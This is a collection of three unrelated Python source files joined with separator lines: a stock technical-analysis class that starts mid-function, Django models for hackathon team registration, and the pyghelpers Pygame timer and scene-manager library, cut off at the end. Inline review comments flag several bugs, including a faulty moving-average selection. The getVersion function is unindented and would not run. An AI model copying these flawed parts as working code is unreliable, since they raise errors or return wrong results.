        header = list(input_list[0].keys())
        writer = csv.writer(outfile)
        writer.writerow(header)
        for record in input_list:
            # Emit values in header order; missing keys become empty cells.
            writer.writerow([record.get(key, "") for key in header])
class TechnicalAnalysisV2:
    """
    Class to perform technical analysis on input stock data.
    The input data should have columns date, open, high, low, close, volume etc.
    """
    def __init__(self, data=None, name: str = None):
        # `name` is used as the base filename for generate_data_set()/analyse_dataset()
        self.data = pd.DataFrame(data)
        self.name = name
    @staticmethod
    def __get_trend(data, stride=1):
        """
        Get trend from a given data.
        :param data: Price data
        :param stride: Neighbour distance to consider for determining trend
        :return: Trend list ('A' ascending, 'D' descending, 'SH' swing high,
                 'SL' swing low, '-' boundary/flat)
        """
        if stride < 1:
            stride = 1
        trend = []
        # indices within `stride` of either end get '-' (no valid neighbours)
        stride_list = [i for i in range(stride)]
        stride_list.extend([(i - (len(data) - 1)) * -1 for i in range(stride)])
        for index, value in enumerate(data):
            if index in stride_list:
                trend.append('-')
                continue
            prev_value = data[index - stride]
            next_value = data[index + stride]
            # strictly between neighbours (ties allowed on one side only)
            if prev_value <= value < next_value or prev_value < value <= next_value:
                trend.append('A')
            elif prev_value >= value > next_value or prev_value > value >= next_value:
                trend.append('D')
            elif prev_value < value > next_value:
                trend.append('SH')
            elif prev_value > value < next_value:
                trend.append('SL')
            else:
                trend.append('-')
        return trend
    def get_swing_data(self, stride, type='close', data=None, ramp=False, swing=True):
        """
        Get actions and swing data for given data
        :param data: Price data
        :param stride: Neighbour distance to consider for determining trend
        :param type: Open, high, low or close.
        :param ramp: Consider ascend and descend separately
        :param swing: If True, considers swing high and low and movement as separate, else Swing low and ascending in
        one and swing high and descending in another
        :return: Dict {actions, swing high, swing low}
        """
        # NOTE(review): `if data:` raises ValueError when a DataFrame is
        # passed (ambiguous truth value); works for None/dict/list inputs.
        if data:
            data = pd.DataFrame(data)[type]
        else:
            data = self.data[type]
        # compute trends at every stride in [0, stride); __get_trend coerces 0 to 1
        trends = []
        for s in range(0, stride, 1):
            trend = self.__get_trend(data=data, stride=s)
            trends.append(trend)
        length = len(trends[0])
        # keep a label only where all strides agree; '.' marks disagreement
        strong_values = []
        for index in range(length):
            value = [t[index] for t in trends]
            equal = all(ele == value[0] for ele in value)
            if equal:
                strong_values.append(value[0])
            else:
                strong_values.append('.')
        """
        Indices for Swing high and Swing low values.
        """
        swing_high_indices = [hi for hi, value in enumerate(strong_values) if value == 'SH']
        swing_low_indices = [li for li, value in enumerate(strong_values) if value == 'SL']
        ascend_indices = [li for li, value in enumerate(strong_values) if value == 'A']
        descend_indices = [li for li, value in enumerate(strong_values) if value == 'D']
        """
        Assign actions corresponding to price.
        """
        actions = []
        if swing:
            for value in strong_values:
                if value == 'SH':
                    actions.append('Sell')
                elif value == 'SL':
                    actions.append('Buy')
                else:
                    if ramp:
                        if value == 'A':
                            actions.append('Hold-Up')
                        else:
                            actions.append('Hold-Down')
                    else:
                        actions.append('Hold')
        if not swing:
            for value in strong_values:
                if value == 'SH' or value == 'D':
                    actions.append('Sell')
                elif value == 'SL' or value == 'A':
                    actions.append('Buy')
                else:
                    # NOTE(review): unknown/'-'/'.' labels also map to 'Buy'
                    # here — confirm this default is intended.
                    actions.append('Buy')
        return {
            'actions': actions,
            'swing_high_indices': swing_high_indices,
            'swing_low_indices': swing_low_indices,
            'ascend_indices': ascend_indices,
            'descend_indices': descend_indices
        }
    def get_indicators(self, *args, data=None, to_percentage=True):
        """
        Get set of indicators on input data
        :param data: Input data (any of open, high, low, close)
        :param args: indicator strings ==> https://pypi.org/project/stockstats/
        :param to_percentage: divide by 100
        :return: Dictionary of technical indicators on input file.
        """
        # NOTE(review): `if data:` raises for DataFrame input (see get_swing_data)
        if data:
            data = pd.DataFrame(data)
        else:
            data = self.data
        stock = StockDataFrame.retype(data)
        indicators = {}
        for arg in args:
            try:
                # 'vwap' is not a stockstats column; computed locally instead
                if 'vwap' == arg:
                    vwap = self.get_vwap(data)
                    indicators['vwap'] = vwap
                    continue
                if to_percentage:
                    indicators[arg] = stock[arg] / 100
                    continue
                indicators[arg] = stock[arg]
            except Exception as e:
                # NOTE(review): unknown indicators are silently skipped —
                # consider at least logging `e`.
                pass
        return indicators
    def get_vwap(self, data=None, autoscale=True):
        """
        Find VWAP for given data
        :param data: frame with 'close' and 'volume' columns (required;
                     unlike the other methods there is no self.data fallback)
        :param autoscale: scale vwap with price to get a smaller value
        :return: cumulative volume-weighted average price series
        """
        close = data['close']
        volume = data['volume']
        vwap = (np.cumsum(volume * close) / np.cumsum(volume))
        if autoscale:
            # normalize so the series peaks at 1.0
            vwap = vwap / max(vwap)
        return vwap
    def get_vwap_gradient(self, data=None, delta=100):
        """
        Get slope of vwap
        :param data:
        :param delta: number of shifted differences averaged into the slope
        :return: mean slope estimate per point
        """
        if data:
            data = pd.DataFrame(data)
        else:
            data = self.data
        vwap = list(self.get_vwap(data, autoscale=True))
        r = []
        # difference vwap against itself rotated by 1..delta-1 steps
        for i in range(1, delta):
            rotated = self.__rotate(vwap, -i)
            v = [(i - j) for (i, j) in zip(vwap, rotated)]
            r.append(v)
        mean = np.mean(r, 0)
        return mean
    def get_candle_ratios(self, data=None, to_percentage=True):
        """
        Get ratios of candle and wicks
        :param data:
        :param to_percentage: divide by 100
        :return: dict of ratios r1..r6 plus candle type t (1=bullish, 0=bearish)
        """
        if data:
            data = pd.DataFrame(data)
        else:
            data = self.data
        high = data['high']
        low = data['low']
        open_ = data['open']
        close = data['close']
        candle = abs(open_ - close)
        candle_type = close > open_
        total_candle = high - low
        # wick sizes depend on candle colour (which of open/close is on top)
        upper_wick = [abs(high[index] - close[index]) if i else abs(high[index] - open_[index]) for
                      index, i in enumerate(candle_type)]
        lower_wick = [abs(low[index] - open_[index]) if i else abs(low[index] - close[index]) for
                      index, i in enumerate(candle_type)]
        type_ = [1 if i else 0 for i in list(close > open_)]
        # ratios; the +0.1 in each denominator avoids division by zero
        if to_percentage:
            r1 = [(i / (j + 0.1)) / 100 for i, j in zip(candle, total_candle)]
            r2 = [(i / (j + 0.1)) / 100 for i, j in zip(upper_wick, total_candle)]
            r3 = [(i / (j + 0.1)) / 100 for i, j in zip(lower_wick, total_candle)]
            r4 = [(i / (j + 0.1)) / 100 for i, j in zip(upper_wick, lower_wick)]
            r5 = [(i / (j + 0.1)) / 100 for i, j in zip(upper_wick, candle)]
            r6 = [(i / (j + 0.1)) / 100 for i, j in zip(lower_wick, candle)]
        else:
            r1 = [(i / (j + 0.1)) for i, j in zip(candle, total_candle)]
            r2 = [(i / (j + 0.1)) for i, j in zip(upper_wick, total_candle)]
            r3 = [(i / (j + 0.1)) for i, j in zip(lower_wick, total_candle)]
            r4 = [(i / (j + 0.1)) for i, j in zip(upper_wick, lower_wick)]
            r5 = [(i / (j + 0.1)) for i, j in zip(upper_wick, candle)]
            r6 = [(i / (j + 0.1)) for i, j in zip(lower_wick, candle)]
        return {
            'r1': r1,
            'r2': r2,
            'r3': r3,
            'r4': r4,
            'r5': r5,
            'r6': r6,
            't': type_
        }
    def generate_data_set(self, type='close', ramp=False, swing=True,
                          include_candle_ratios=True):
        """
        Generate dataset from given data and save as csv file (<self.name>.csv).
        :param type: Column to consider. open, high, low or close.
        :param ramp:Boolean. Consider ascend and descend separately
        :param swing:Boolean. If True, considers swing high and low and movement as separate, else Swing low and ascending in
        one and swing high and descending in another
        :param include_candle_ratios: Boolean. Include the different ratios of a candle wicks and body.
        :return:
        """
        # NOTE(review): this assignment shadows the `swing` parameter with the
        # result dict — harmless here but easy to misread.
        swing = self.get_swing_data(stride=1, type=type, ramp=ramp, swing=swing)
        indicators = self.get_indicators('rsi_6', 'rsi_10', 'pdi', 'mdi', 'adx', 'kdjk', 'kdjd',
                                         'kdjj', 'wr_6', 'wr_10', 'vwap')
        if include_candle_ratios:
            ratios = self.get_candle_ratios()
            indicators.update(ratios)
        indicators['actions'] = swing['actions']
        # drop the first 5 rows, where lookback indicators are not warmed up
        data_set = pd.DataFrame(data=indicators).iloc[5:]
        data_set.to_csv(self.name + '.csv', index=False)
    @staticmethod
    def __rotate(input_list, n):
        # circularly rotate a list left by n (negative n rotates right)
        return input_list[n:] + input_list[:n]
    def get_best_moving_average(self, max_length=200, min_length=10):
        """
        Get the best moving average that act as support/resistance.
        :param max_length:
        :param min_length:
        :return: best moving average
        """
        data = self.data
        data_open = data.get('open')
        data_close = data.get('close')
        data_high = data.get('high')
        data_low = data.get('low')
        assert len(data_close) > max_length
        assert min_length <= max_length
        errors = []
        # True: Green, False:Red
        # Looking for consecutive red or green candles to confirm trend
        candle_type = [data_close[i] >= data_open[i] for i in range(len(data_close))]
        next_candle_1 = self.__rotate(candle_type, -1)
        next_candle_2 = self.__rotate(candle_type, 1)
        trend = np.logical_and(np.logical_and(candle_type, next_candle_1), next_candle_2)
        for length in range(min_length, max_length + 1, 1):
            sma = 'close_' + str(length) + '_sma'
            average_close = list(self.get_indicators(sma)[sma])[length - 1:]
            high = list(data_high)[length - 1:]
            low = list(data_low)[length - 1:]
            direction = trend[length - 1:]
            # in an uptrend the SMA should hug the lows; in a downtrend the highs
            anchor = [low[index] if value else high[index] for index, value in enumerate(direction)]
            error = [abs(anchor[index] - value) for index, value
                     in enumerate(average_close)]
            errors.append(int(np.median(error) * 10000))
        # NOTE(review): np.median of an even-length list may not be an element
        # of `errors`, in which case .index() raises ValueError; also the
        # returned value is index+1, not offset by min_length — confirm whether
        # `min_length + errors.index(min(errors))` was intended.
        return errors.index(np.median(errors)) + 1
    def plot_chart(self, type='candle', moving_averages: tuple = None, show_volume=True, length=100):
        """
        Plot candlestick
        :param show_volume: plot volume or not
        :param type: candle, line, renko, ohlc, bars
        :param moving_averages: tuple. Moving averages to be plotted
        :param length: length of data to be displayed
        :return:
        """
        max_length = len(self.data)
        assert max_length > length
        # plot only the most recent `length` rows
        data = self.data[max_length - length:]
        if moving_averages:
            mpf.plot(data, type=type, mav=moving_averages, volume=show_volume)
        else:
            mpf.plot(data, type=type, volume=show_volume)
    def analyse_dataset(self):
        """
        Plot correlation matrix, histogram and density plots from the dataset
        previously written by generate_data_set().
        :return:
        """
        filename = self.name + '.csv'
        try:
            dataset = pd.read_csv(filename)
            correlation = dataset.corr()
            sn.heatmap(correlation, annot=True)
            plt.show()
            dataset.plot(kind='hist')
            plt.show()
            dataset.plot(kind='density')
            plt.show()
            print('Max value: ', dataset.max(), ' Min value: ', dataset.min())
        except Exception as e:
            # best-effort: a missing/corrupt CSV is reported, not raised
            print(e)
|
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.forms import ModelForm
class Team(models.Model):
    """A hackathon team and its idea submission."""
    team_name = models.CharField(max_length=100, unique=True)
    idea_title = models.CharField(max_length=100)
    idea_description = models.CharField(max_length=1000)

    def __unicode__(self):
        # Python 2 representation (used by Django on py2).
        return self.team_name

    def __str__(self):
        # Python 3 ignores __unicode__; without __str__ the admin/shell would
        # show the generic "Team object" representation.
        return self.team_name
class Participant(models.Model):
    """Registration details linking a Django auth User to a Team."""
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    college = models.CharField(max_length=100)
    contact = models.CharField(max_length=13)
    team = models.ForeignKey(Team, on_delete=models.CASCADE)
    is_approved = models.BooleanField()
    is_paid = models.BooleanField()

    def __unicode__(self):
        # Python 2 representation (used by Django on py2).
        return self.user.username

    def __str__(self):
        # Python 3 ignores __unicode__; keep both for cross-version behavior.
        return self.user.username
class TeamForm(ModelForm):
    """ModelForm for creating/editing a Team (name, title and description)."""
    class Meta:
        model = Team
        fields = ['team_name', 'idea_title', 'idea_description']
|
"""
pyghelpers is a collection of classes and functions written in Python for use with Pygame.
pyghelpers is pronounced "pig helpers".
Developed by Irv Kalb - Irv at furrypants.com
Full documentation at: https://pyghelpers.readthedocs.io/en/latest/
pyghelpers contains the following classes:
- Timer - a simple timer
- CountUpTimer - a timer that counts up from zero
- CountDownTimer - a timer that counts down from a starting point
- SceneMgr - allows for a Pygame program with multiple scenes
- Scene - base class for a scene managed by the SceneMgr
pyghelpers also contains the following functions:
- textYesNoDialog - a text-based dialog box allowing for one or two answers (yes/no, or just OK)
- customYesNoDialog - a dialog box with custom graphics (yes/no, or just OK)
- textAnswerDialog - a text-based dialog box allowing the user to enter a string
- customAnswerDialog - a dialog box with custom graphics that allows the user to enter a string
Many helpers allow the use of a callback (a function or method to be called when an action happens)
Any widget that uses a callback should be set up like this:
def <callbackMethodName>(self, nickName):
When the appropriate action happens, the callback method will be called and the nickName will be passed.
If you don't need the nickname, you can just ignore that parameter
"""
"""
************************************************************************************************
Simplified BSD License:
Copyright 2017 Irv Kalb. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are
permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of
conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list
of conditions and the following disclaimer in the documentation and/or other materials
provided with the distribution.
THIS SOFTWARE IS PROVIDED BY Irv Kalb ''AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Irv Kalb OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those of the
authors and should not be interpreted as representing official policies, either expressed
or implied, of Irv Kalb.
******************************************************************************************
History:
11/21 Version 1.0.3
Cleaned up some documentation of parameters
Removed all FileIO functions
Added __all__ to define what gets imported when you import *
Change the SceneMgr so you pass in list of Scenes objects instead of a dictionary.
                    Each scene must implement getSceneKey to define the scene key.
First scene in the list is the starting scene.
Use ABC for abstract base class and abstract methods
Updated code using f strings in Timer's getTimeHHMMSS, and clean up of timers
Turn off key repeating when going to a new scene
Changed SceneMgr _goToScene method to goToScene
5/26/20 Version 1.0.2
Added __version__ and function getVersion()
Version 1.0 01/13/20
"""
# Public API of the pyghelpers package: what `from pyghelpers import *` exports.
__all__ = [
    'CountDownTimer',
    'CountUpTimer',
    'DIALOG_BACKGROUND_COLOR',
    'DIALOG_BLACK',
    'Scene',
    'SceneMgr',
    'Timer',
    'customAnswerDialog',
    'customYesNoDialog',
    'textAnswerDialog',
    'textYesNoDialog',
    ]
import pygame
from pygame.locals import *
import pygwidgets
import sys
import time
from abc import ABC, abstractmethod
__version__ = "1.0.3"
def getVersion():
"""Returns the current version number of the pyghelpers package"""
return __version__
# Timer classes:
# Timer (simple)
# CountUpTimer
# CountDownTimer
# Timer
class Timer():
    """
    A minimal one-shot timer.

    Typical use:

    1) Create it:
           myTimer = pyghelpers.Timer(10)

    2) Start it (may also be called again later to restart):
           myTimer.start()

    3) Poll it once per frame in your big loop:
           finished = myTimer.update()
       update() returns False while the timer is running and True exactly
       once, when the duration has elapsed.

    Parameters:
    | timeInSeconds - the duration of the timer, in seconds (integer or float)

    Optional keyword parameters:
    | nickname - an internal name to associate with this timer (defaults to None)
    | callBack - a function or object.method called when the timer finishes;
    |            the timer's nickname is passed to the callback (defaults to None)
    """
    def __init__(self, timeInSeconds, nickname=None, callBack=None):
        self.timeInSeconds = timeInSeconds
        self.nickname = nickname
        self.callBack = callBack
        self.savedSecondsElapsed = 0.0
        self.running = False

    def start(self, newTimeInSeconds=None):
        """Start (or restart) the timer from zero.

        Optionally specify a different duration for this run.
        """
        if newTimeInSeconds is not None:
            self.timeInSeconds = newTimeInSeconds
        self.startTime = time.time()
        self.running = True

    def update(self):
        """Poll the timer; call once per frame.

        Returns:
        | False - while the timer is not running or has not yet expired
        | True - once, at the moment the timer finishes
        | (you can use this indication, or set up a callback)
        """
        if not self.running:
            return False
        self.savedSecondsElapsed = time.time() - self.startTime
        if self.savedSecondsElapsed < self.timeInSeconds:
            return False
        # Duration reached: stop, fire the callback (if any), report done.
        self.running = False
        if self.callBack is not None:
            self.callBack(self.nickname)
        return True

    def getTime(self):
        """Return seconds elapsed since start() as a float.

        Returns 0 if the timer was never started; if the timer has been
        stopped, returns the elapsed time captured at stop().
        """
        if self.running:
            self.savedSecondsElapsed = time.time() - self.startTime
        return self.savedSecondsElapsed

    def stop(self):
        """Stop the timer, retaining the final elapsed time."""
        self.getTime()  # snapshot final self.savedSecondsElapsed
        self.running = False
# CountUpTimer class
class CountUpTimer():
    """A timer that counts upward, starting from zero.

    Intended for continuously displaying elapsed time in a window
    (e.g. with a DisplayText object).
    Typical use:
    1) Create a CountUpTimer object:
       myTimer = pyghelpers.CountUpTimer()
    2) Start it running (this call may also be used to restart it):
       myTimer.start()
    3) Every time through your main loop, read the elapsed time with one of:
       myTimer.getTime()           # float seconds
       myTimer.getTimeInSeconds()  # integer seconds
       myTimer.getTimeInHHMMSS()   # 'HH:MM:SS'-style string
    4) To stop the timer:
       myTimer.stop()
    Parameters:
    | none
    """
    def __init__(self):
        self.running = False
        self.savedSecondsElapsed = 0.0  # last measured elapsed time
        self.secondsStart = 0  # safeguard value until start() is called

    def start(self):
        """Start (or restart) the timer counting from zero."""
        self.secondsStart = time.time()  # remember the wall-clock start moment
        self.savedSecondsElapsed = 0.0
        self.running = True

    def getTime(self):
        """Return the elapsed time as a float number of seconds."""
        if not self.running:
            return self.savedSecondsElapsed  # frozen value from before stop()
        self.savedSecondsElapsed = time.time() - self.secondsStart
        return self.savedSecondsElapsed

    def getTimeInSeconds(self):
        """Return the elapsed time as an integer number of seconds."""
        return int(self.getTime())

    def getTimeInHHMMSS(self, nMillisecondsDigits=0):
        """Return the elapsed time as an 'HH:MM:SS.mmm'-formatted string.

        Leading zero fields are omitted (e.g. '5', '1:05', '1:02:05').
        Optional keyword parameters:
        | nMillisecondsDigits - number of fractional-second digits to
        |   include (defaults to 0); if given, output looks like HH:MM:SS.mmm
        """
        elapsed = self.getTime()
        minutes, seconds = divmod(elapsed, 60)
        hours, minutes = divmod(int(minutes), 60)
        if nMillisecondsDigits > 0:
            secondsWidth = nMillisecondsDigits + 3  # 2 digits + '.' + fraction
        else:
            secondsWidth = 2
        if hours > 0:
            return f'{hours:d}:{minutes:02d}:{seconds:0{secondsWidth}.{nMillisecondsDigits}f}'
        if minutes > 0:
            return f'{minutes:d}:{seconds:0{secondsWidth}.{nMillisecondsDigits}f}'
        return f'{seconds:.{nMillisecondsDigits}f}'

    def stop(self):
        """Stop the timer, preserving the final elapsed time."""
        self.getTime()  # capture the final savedSecondsElapsed
        self.running = False
# To do: Would be nice to add both pause and continue methods
#
# CountDownTimer class
#
class CountDownTimer():
    """A timer that counts down from a given starting number of seconds.

    Intended for continuously displaying remaining time in a window
    (e.g. with a DisplayText object).
    Typical use:
    1) Create a CountDownTimer object:
       myTimer = pyghelpers.CountDownTimer(60)  # start the timer at 60 seconds
    2) Start it running (this call may also be used to restart it):
       myTimer.start()
    3) Every time through your main loop, read the remaining time with one of:
       myTimer.getTime()           # float seconds
       myTimer.getTimeInSeconds()  # integer seconds
       myTimer.getTimeInHHMMSS()   # 'HH:MM:SS'-style string
    4) To stop the timer:
       myTimer.stop()
    Parameters:
    | nStartingSeconds - the starting point for the timer, in seconds (integer or float)
    Optional keyword parameters:
    | stopAtZero - should the timer stop when it reaches zero (defaults to True)
    | nickname - an internal name used to refer to this timer (defaults to None)
    | callBack - a function or object.method called back when the timer finishes;
    |            the timer's nickname is passed in when the callback is made (defaults to None)
    """
    def __init__(self, nStartingSeconds, stopAtZero=True, nickname=None, callBack=None):
        self.nStartingSeconds = nStartingSeconds  # duration to count down from
        self.stopAtZero = stopAtZero  # clamp at zero and stop when reached?
        self.nickname = nickname  # passed to callBack when the timer finishes
        self.callBack = callBack  # optional callable invoked when zero is reached
        self.running = False
        self.secondsSavedRemaining = 0.0  # last computed remaining time
        self.reachedZero = False  # latched by getTime(), consumed by ended()

    def start(self, newStartingSeconds=None):
        """Start the timer at nStartingSeconds (or an optional new duration)."""
        secondsNow = time.time()
        if newStartingSeconds is not None:
            self.nStartingSeconds = newStartingSeconds
        # Wall-clock moment at which the remaining time reaches zero.
        self.secondsEnd = secondsNow + self.nStartingSeconds
        self.reachedZero = False
        self.running = True

    def getTime(self):
        """Return the remaining time as a float number of seconds."""
        if not self.running:
            return self.secondsSavedRemaining
        self.secondsSavedRemaining = self.secondsEnd - time.time()
        if self.stopAtZero and (self.secondsSavedRemaining <= 0):
            # Clamp at zero, stop, and remember that the timer expired so
            # a subsequent call to ended() reports True (once).
            self.secondsSavedRemaining = 0.0
            self.running = False
            self.reachedZero = True
        return self.secondsSavedRemaining  # returns a float

    def getTimeInSeconds(self):
        """Return the remaining time as an integer number of seconds."""
        nSeconds = int(self.getTime())
        return nSeconds

    def getTimeInHHMMSS(self, nMillisecondsDigits=0):
        """Return the remaining time as an 'HH:MM:SS.mmm'-formatted string.

        Optional keyword parameters:
        | nMillisecondsDigits - number of fractional-second digits to
        |   include (defaults to 0); if given, output looks like HH:MM:SS.mmm
        """
        nSeconds = self.getTime()
        mins, secs = divmod(nSeconds, 60)
        hours, mins = divmod(int(mins), 60)
        if nMillisecondsDigits > 0:
            secondsWidth = nMillisecondsDigits + 3  # 2 digits + '.' + fraction
        else:
            secondsWidth = 2
        if hours > 0:
            output = f'{hours:d}:{mins:02d}:{secs:0{secondsWidth}.{nMillisecondsDigits}f}'
        elif mins > 0:
            output = f'{mins:d}:{secs:0{secondsWidth}.{nMillisecondsDigits}f}'
        else:
            output = f'{secs:.{nMillisecondsDigits}f}'
        # Bug fix: the old code stored this formatted *string* into
        # self.savedSecondsElapsed, an attribute copied over from
        # CountUpTimer that this class never defines nor reads anywhere.
        return output

    def stop(self):
        """Stop the timer, preserving the final remaining time."""
        self.getTime()  # remembers final self.secondsSavedRemaining
        self.running = False

    def ended(self):
        """Report (once) whether the timer has reached zero.

        Should be called every time through the loop; fires the callback,
        if any, the first time it is called after the timer expires.
        """
        if self.reachedZero:
            self.reachedZero = False  # reset the latch: report True only once
            if self.callBack is not None:
                self.callBack(self.nickname)
            return True
        else:
            return False
# To do: Would be nice to add both pause and continue methods
#
#
# Scene Manager
#
#
class SceneMgr():
    """SceneMgr (Scene Manager) allows you to build a program with multiple scenes.
    The SceneMgr manages any number of scenes built as subclasses of the "Scene" class.
    For more details, see the "Scene" class.
    Typical use:
    1) Instantiate as many Scenes as you want:
    |
    | oScene1 = StartingScene(window)
    | oScene2 = MainScene(window)
    | oScene3 = SomeOtherScene(window)
    2) Build a list of these scenes:
         myScenesList = [oScene1, oScene2, oScene3]
    3) Instantiate *one* SceneMgr (a singleton):
         oSceneMgr = SceneMgr(myScenesList, 30)  # First scene in the list is the starting scene
    4) Call the run method to start the SceneMgr running:
         oSceneMgr.run()  # First scene in the list is the starting scene
    Parameters:
    | scenesList - is a list that consists of:
    |    [<sceneObject>, <sceneObject>, ...]
    |    where each sceneObject is an object instantiated from a scene class
    |    (For details on Scenes, see the Scene class)
    | fps - is the frames per second at which the program should run
    Based on the concept of a "Scene Manager" by Blake O'Hare of Nerd Paradise (nerdparadise.com)
    """
    def __init__(self, scenesList, fps):
        # Build a dictionary, each entry of which is a scene key : scene object
        self.scenesDict = {}
        for oScene in scenesList:
            key = oScene.getSceneKey()  # Each scene must return a unique key to identify itself
            self.scenesDict[key] = oScene
        # The first element in the list is used as the starting scene
        self.oCurrentScene = scenesList[0]
        self.framesPerSecond = fps
        # Give each scene a reference back to the SceneMgr.
        # This allows any scene to do a goToScene, request, send,
        # or sendAll, which gets forwarded to the scene manager.
        for key, oScene in self.scenesDict.items():
            oScene._setRefToSceneMgr(self)

    def run(self):
        """ This method implements the main pygame loop.
        It should typically be called as the last line of your main program.
        It is designed to call a standardized set of methods in the current scene.
        All scenes must implement the following methods (polymorphism):
        |    handleInputs  # called in every frame
        |    draw          # called in every frame
        The following methods can be implemented in a scene. If they are not
        implemented, then the default version in the Scene base class will be used.
        (Those methods do not do anything):
        |    enter   # called once whenever the scene is entered
        |    update  # called in every frame
        |    leave   # called once whenever the scene is left
        """
        clock = pygame.time.Clock()
        # 6 - Loop forever
        while True:
            keysDownList = pygame.key.get_pressed()
            # 7 - Check for and handle events
            eventsList = []
            for event in pygame.event.get():
                if (event.type == pygame.QUIT) or \
                        ((event.type == pygame.KEYDOWN) and
                         (event.key == pygame.K_ESCAPE)):
                    # Tell current scene we're leaving
                    self.oCurrentScene.leave()
                    pygame.quit()
                    sys.exit()
                eventsList.append(event)
            # Here, we let the current scene process all events,
            # do any "per frame" actions in its update method,
            # and draw everything that needs to be drawn.
            self.oCurrentScene.handleInputs(eventsList, keysDownList)
            self.oCurrentScene.update()
            self.oCurrentScene.draw()
            # 11 - Update the window
            pygame.display.update()
            # 12 - Slow things down a bit
            clock.tick(self.framesPerSecond)

    def _goToScene(self, nextSceneKey, dataForNextScene):
        """Called by a Scene, tells the SceneMgr to go to another scene
        (From the Scene's point of view, it just needs to call its own goToScene method)
        This method:
        - Tells the current scene that it is leaving, calls leave method
        - Gets any data the leaving scene wants to send to the new scene
        - Tells the new scene that it is entering, calls enter method
        Raises:
        - KeyError if the nextSceneKey is not valid
        """
        if nextSceneKey is None:  # meaning, exit
            pygame.quit()
            sys.exit()
        # Call the leave method of the old scene to allow it to clean up.
        # Set the new scene (based on the key) and
        # call the enter method of the new scene.
        self.oCurrentScene.leave()
        pygame.key.set_repeat(0)  # turn off repeating characters
        try:
            self.oCurrentScene = self.scenesDict[nextSceneKey]
        except KeyError:
            raise KeyError("Trying to go to scene '" + nextSceneKey +
                           "' but that key is not in the dictionary of scenes.")
        self.oCurrentScene.enter(dataForNextScene)

    def _request_respond(self, targetSceneKey, requestID):
        """Internal method, called by a Scene tells SceneMgr to query another scene for information.
        (From the Scene's point of view, it just needs to call its own request method)
        The target scene must implement a method named "respond"
        """
        oTargetScene = self.scenesDict[targetSceneKey]
        info = oTargetScene.respond(requestID)
        return info

    def _send_receive(self, targetSceneKey, sendID, info):
        """Internal method, called by a Scene, tells the Scene Manager to send information to another scene
        (From the sending scene's point of view, it just needs to call its own send method)
        The target scene must implement a method named "receive"
        """
        oTargetScene = self.scenesDict[targetSceneKey]
        oTargetScene.receive(sendID, info)

    def _sendAll_receive(self, oSenderScene, sendID, info):
        """Internal method, called by a Scene tells the Scene Manager to send information to all scenes (other than itself)
        (From the sending scene's point of view, it just needs to call its own sendAll method)
        All scenes must implement a method named "receive"
        """
        # Broadcast to every scene except the sender itself.
        for sceneKey in self.scenesDict:
            oTargetScene = self.scenesDict[sceneKey]
            if oTargetScene != oSenderScene:
                oTargetScene.receive(sendID, info)
class Scene(ABC):
    """Abstract base class for scenes managed by a SceneMgr.

    Subclass this once per scene in your program.  Your subclass's
    __init__ receives the window and should keep a reference to it:

    |    def __init__(self, window):
    |        self.window = window
    |        # any other initialization you want

    Required overrides (called by the SceneMgr while the scene is active):

    |    getSceneKey()   - return a string or constant that uniquely identifies the scene
    |                      (a constant imported from a shared Constants.py is recommended)
    |    handleInputs()  - called in every frame to process events and pressed keys
    |    draw()          - called in every frame to draw the scene

    Optional overrides (the defaults here do nothing):

    |    enter(data)  - called once whenever this scene becomes current
    |    update()     - called in every frame
    |    leave()      - called once whenever another scene takes over

    To switch scenes, call self.goToScene() with the destination's scene
    key and, optionally, any data for the next scene's enter() method.
    To quit the program from inside a scene, call self.quit().
    """

    def __del__(self):
        # Internal: drop the back-reference to the SceneMgr when this scene dies.
        self.oSceneMgr = None

    def _setRefToSceneMgr(self, oSceneMgr):
        """Internal: store the SceneMgr reference used by goToScene/request/send.

        Called by the SceneMgr at startup.  Do not change or override this.
        """
        self.oSceneMgr = oSceneMgr

    def enter(self, data):
        """Called whenever this scene becomes the current scene.

        Override it if you expect data, or need to (re)start the scene.
        Parameters:
        | data - any value agreed upon by the previous scene and this one
        """
        pass

    @abstractmethod
    def getSceneKey(self):
        """Return the unique scene key for this scene (must be overridden)."""
        raise NotImplementedError

    @abstractmethod
    def handleInputs(self, events, keyPressedList):
        """Handle this frame's events and key presses (must be overridden).

        Parameters:
        | events - a list of events your method should handle
        | keyPressedList - a list of Booleans, one per key, True if pressed
        """
        raise NotImplementedError

    def update(self):
        """Per-frame processing hook; override if the scene needs it."""
        pass

    @abstractmethod
    def draw(self):
        """Draw everything the scene needs drawn (must be overridden)."""
        raise NotImplementedError

    def leave(self):
        """Called whenever the user leaves this scene; override to clean up."""
        pass

    def quit(self):
        """Quit the whole program from inside this scene."""
        self.goToScene(None)

    def goToScene(self, nextSceneKey, data=None):
        """Switch to another scene.

        Parameters:
        | nextSceneKey - the scene key (string) of the scene to go to
        | data - optional value handed to the next scene's enter() method
        |        (can be a single value, list, dictionary, object, etc.)
        """
        self.oSceneMgr._goToScene(nextSceneKey, data)

    def request(self, targetSceneKey, requestID):
        """Ask another scene for information via its respond() method.

        The two scenes agree on the meaning of requestID and the reply.
        Parameters:
        | targetSceneKey - the scene key (string) of the scene to query
        | requestID - identifies the data wanted (typically a string)
        """
        answer = self.oSceneMgr._request_respond(targetSceneKey, requestID)
        return answer

    def send(self, targetSceneKey, sendID, info):
        """Push information to another scene via its receive() method.

        Parameters:
        | targetSceneKey - the scene key (string) of the destination scene
